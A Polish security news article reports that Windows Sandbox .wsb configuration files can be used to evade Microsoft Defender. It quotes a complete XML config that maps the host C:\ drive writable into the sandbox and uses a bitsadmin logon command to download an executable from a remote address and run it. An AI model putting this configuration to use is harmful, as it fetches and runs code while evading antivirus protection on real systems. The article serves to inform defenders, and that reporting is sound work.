Windows Sandbox potrafi oszukać antywirusa Microsoft Defender

7 grudnia, 2020
window sandbox w windows 10

Funkcja Windows Sandbox została wprowadzona do Windows 10 Pro i Windows 10 Enterprise jako uzupełnienie zabezpieczeń systemowych przed exploitami. Niestety nie w pełni zostało to przetestowane pod kątem bezpieczeństwa, ponieważ początkowo funkcja piaskownicy miała pomagać w walce przeciwko exploitom na antywirusa Microsoft Defender. Używanie exploitów to niebezpieczny proceder, ponieważ za pomocą luki w antywirusie możliwe jest uruchomienie kodu z uprawnieniami systemowymi. „Sandboksowanie” miało przed tym chronić. I zamiast zabezpieczeń mamy nowy sposób używania systemowych funkcji do oszukiwania antywirusa Microsoft Defender.

Windows Sandbox w Windows 10 Pro / Enterprise

Piaskownica Microsoftu to w rzeczywistości:

  • maszyna wirtualna wykorzystująca wbudowany hiperwizor Hyper-V,
  • posiadająca funkcję przywracania migawek (przy każdym nowym uruchomieniu),
  • pozwalająca na odzyskanie pamięci RAM zarezerwowaną do działania piaskownicy,
  • umożliwia dynamiczne współdzielenie plików z hostem.

Windows Sandbox może używać plików z rozszerzeniem *.WSB jako dodatkowej konfiguracji dla maszyny wirtualnej. Jest to zwykły plik XML z informacjami technicznymi np. ilościami rdzeni CPU, współdzieleniem schowka, karty sieciowej itp. Więcej danych na ten temat podaje firma Microsoft na tej stronie oraz na tej. Dodajmy, że rozszerzenie WSB jest domyślne skojarzone z programem WindowsSandbox.exe.

window sandbox w windows 10
Windows Sandbox w Windows 10 Pro. Windows 10 Home nie posiada takiej funkcjonalności.

Internauta opisał na blogu jak obejść zabezpieczenia antywirusa Microsoft Defender za pomocą Windows Sandbox. Stworzył konfigurację XML zawierającą polecenia pobierające szkodliwy plik.

<Configuration>
<MappedFolders>
   <MappedFolder>
     <HostFolder>C:\</HostFolder>
     <SandboxFolder>C:\Users\WDAGUtilityAccount\UserFiles</SandboxFolder>
     <ReadOnly>false</ReadOnly>
   </MappedFolder>
</MappedFolders>
<LogonCommand>
    <Command>C:\Users\ping 127.0.0.1 -n 3>null&bitsadmin /transfer myjob /download /priority high http://192.168.0.4/cs_wsb_test.bin "%APPDATA%\cs.exe">nul&start %APPDATA%\cs.exe</Command>
  </LogonCommand>
</Configuration>

Tym oto sposobem zespoły red-team i cyberprzestępcy uzyskali nową sposobność na obchodzenie zabezpieczeń Windows. Brawo!

Czy ten artykuł był pomocny?

Oceniono: 0 razy

Picture of Adrian Ścibor

Adrian Ścibor

W ramach działań związanych z cyberbezpieczeństwem odpowiada w AVLab za przeprowadzanie testów rozwiązań ochronnych przed zagrożeniami. Opracowuje strategie oraz narzędzia, które pomagają w ochronie danych i systemów przed cyberatakami. Współuczestnik międzynarodowej grupy non-profit AMTSO, która zrzesza ekspertów IT.
Picture of Adrian Ścibor

Adrian Ścibor

W ramach działań związanych z cyberbezpieczeństwem odpowiada w AVLab za przeprowadzanie testów rozwiązań ochronnych przed zagrożeniami. Opracowuje strategie oraz narzędzia, które pomagają w ochronie danych i systemów przed cyberatakami. Współuczestnik międzynarodowej grupy non-profit AMTSO, która zrzesza ekspertów IT.

PODZIEL SIĘ:

guest
0 komentarzy
najstarszy
najnowszy oceniany
Inline Feedbacks
View all comments

Wyrażam zgodę na przesłanie oferty drogą telefoniczną przez IT Partners security sp. z o.o. z siedzibą Katowicach ul.Padereskiego 35 na podany przeze mnie adres e-mail zgodnie z ustawą z dnia 10 maja 2018 roku o ochronie danych osobowych (Dz. Ustaw z 2018, poz. 1000) oraz zgodnie z Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (RODO).

Wyrażam zgodę na przesłanie oferty drogą mailową przez IT Partners security sp. z o.o. z siedzibą Katowicach ul.Padereskiego 35 na podany przeze mnie adres e-mail zgodnie z ustawą z dnia 10 maja 2018 roku o ochronie danych osobowych (Dz. Ustaw z 2018, poz. 1000) oraz zgodnie z Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (RODO).

[ninja_tables id=”27481″]